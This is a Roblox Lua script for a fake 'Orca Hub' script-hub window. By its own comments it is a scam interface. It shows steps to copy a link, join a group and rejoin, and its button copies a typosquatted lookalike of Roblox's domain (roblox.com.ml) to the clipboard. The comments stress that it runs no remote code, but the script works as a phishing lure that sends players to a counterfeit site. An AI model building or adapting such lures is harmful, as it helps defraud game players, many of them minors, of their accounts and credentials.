-- Orca Hub - DECOY UI SCRIPT (No hub load, purely visual scam interface) -- This script only creates a floating GUI with a copy link button. -- It does NOT load any external scripts, execute code, or perform any actions besides copying a link. local Players = game:GetService("Players") local Player = Players.LocalPlayer local GuiService = game:GetService("GuiService") local UserInputService = game:GetService("UserInputService") -- Create ScreenGui local screenGui = Instance.new("ScreenGui") screenGui.Name = "OrcaHubGUI" screenGui.Parent = Player:WaitForChild("PlayerGui") screenGui.ResetOnSpawn = false -- Main frame (black, white outline, neon glow effect) local mainFrame = Instance.new("Frame") mainFrame.Name = "MainFrame" mainFrame.Size = UDim2.new(0, 400, 0, 300) mainFrame.Position = UDim2.new(0.5, -200, 0.5, -150) mainFrame.BackgroundColor3 = Color3.new(0, 0, 0) mainFrame.BackgroundTransparency = 0 mainFrame.BorderColor3 = Color3.new(1, 1, 1) mainFrame.BorderSizePixel = 2 mainFrame.ClipsDescendants = false mainFrame.Parent = screenGui -- Glow layers (white neon outline) local function createGlowFrame(parent, offset, transparency, sizeMultiplier) local glow = Instance.new("Frame") glow.Size = UDim2.new(1 + sizeMultiplier, 0, 1 + sizeMultiplier, 0) glow.Position = UDim2.new(-offset.X, 0, -offset.Y, 0) glow.BackgroundColor3 = Color3.new(1, 1, 1) glow.BackgroundTransparency = transparency glow.BorderSizePixel = 0 glow.Parent = parent return glow end createGlowFrame(mainFrame, Vector2.new(0.02, 0.02), 0.8, 0.04) createGlowFrame(mainFrame, Vector2.new(0.01, 0.01), 0.6, 0.02) createGlowFrame(mainFrame, Vector2.new(-0.01, -0.01), 0.6, 0.02) createGlowFrame(mainFrame, Vector2.new(-0.02, -0.02), 0.8, 0.04) -- Title "Orca Hub" local titleLabel = Instance.new("TextLabel") titleLabel.Name = "TitleLabel" titleLabel.Size = UDim2.new(1, 0, 0, 40) titleLabel.Position = UDim2.new(0, 0, 0, 10) titleLabel.BackgroundTransparency = 1 titleLabel.Text = "Orca Hub" titleLabel.TextColor3 = Color3.new(1, 1, 1) titleLabel.TextScaled = true titleLabel.Font = Enum.Font.GothamBold titleLabel.TextStrokeColor3 = Color3.new(0.5, 0.5, 0.5) titleLabel.TextStrokeTransparency = 0.3 titleLabel.Parent = mainFrame -- Steps local steps = { "1. COPY LINK", "2. JOIN GROUP", "3. REJOIN AND ENJOY YOUR SCRIPT" } local stepY = 60 for i, stepText in ipairs(steps) do local stepLabel = Instance.new("TextLabel") stepLabel.Size = UDim2.new(1, 0, 0, 30) stepLabel.Position = UDim2.new(0, 0, 0, stepY + (i-1)*35) stepLabel.BackgroundTransparency = 1 stepLabel.Text = stepText stepLabel.TextColor3 = Color3.new(1, 1, 1) stepLabel.TextScaled = true stepLabel.Font = Enum.Font.Gotham stepLabel.TextXAlignment = Enum.TextXAlignment.Center stepLabel.Parent = mainFrame end -- Copy Link Button local copyButton = Instance.new("TextButton") copyButton.Name = "CopyButton" copyButton.Size = UDim2.new(0.5, 0, 0, 40) copyButton.Position = UDim2.new(0.25, 0, 0.75, 0) copyButton.BackgroundColor3 = Color3.new(0, 0, 0) copyButton.BorderColor3 = Color3.new(1, 1, 1) copyButton.BorderSizePixel = 2 copyButton.Text = "COPY LINK" copyButton.TextColor3 = Color3.new(1, 1, 1) copyButton.TextScaled = true copyButton.Font = Enum.Font.GothamBold copyButton.Parent = mainFrame createGlowFrame(copyButton, Vector2.new(0.01, 0.01), 0.5, 0.02) local linkToCopy = "https://www.roblox.com.ml/communities/257222452632/romoHUB" copyButton.MouseButton1Click:Connect(function() if setclipboard then setclipboard(linkToCopy) elseif toclipboard then toclipboard(linkToCopy) elseif (syn and syn.write_clipboard) then syn.write_clipboard(linkToCopy) elseif (game and game:GetService("GuiService") and GuiService.SetClipboard) then GuiService:SetClipboard(linkToCopy) else warn("Clipboard not available, link: " .. linkToCopy) end copyButton.Text = "COPIED!" wait(1) copyButton.Text = "COPY LINK" end) -- Dragging logic local dragging = false local dragStart, startPos mainFrame.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = mainFrame.Position end end) mainFrame.InputEnded:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = false end end) UserInputService.InputChanged:Connect(function(input) if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then local delta = input.Position - dragStart mainFrame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) end end) screenGui.DisplayOrder = 999 -- No hub loader, no background execution, no auto-run. Just the GUI. print("Orca Hub decoy loaded. No actual hub functionality present.")